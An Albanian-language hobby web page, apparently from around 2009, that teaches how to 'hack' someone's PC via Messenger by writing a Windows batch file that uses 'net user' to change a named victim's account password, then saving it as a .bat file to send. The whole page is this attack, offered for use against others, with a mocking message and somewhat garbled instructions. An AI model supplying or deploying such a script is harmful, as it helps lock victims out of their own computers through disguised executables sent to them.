HTML Free Code
   
  Mire Se Vini
  hacko pc e dikujna permes messengerit ( 2oo9 )
 

Kjo osht ajo qe duhet te beni::
krijoni nje text document te ri dhe ne te shkruani


Kodi:
1:@echo off
2:net user "psh emri i viktimes" dhe passin e ri qe doni ju *123456*
3:echo "Say Good Bay To The Bad Gay "
4:Pausemos harroni te futni passin e ri ne ato yjet ( shift 8 )
ruajeni si diqka qe ju doni por me pikë bat( .bat ) psh.. Say Good Bay To The Bad Gay.bat
ruajeni tek ALL FILES sepse ndryshe nuk funksionon

 

 
  Byy GenTy  
 
=> Do you also want a homepage for free? Then click here! <=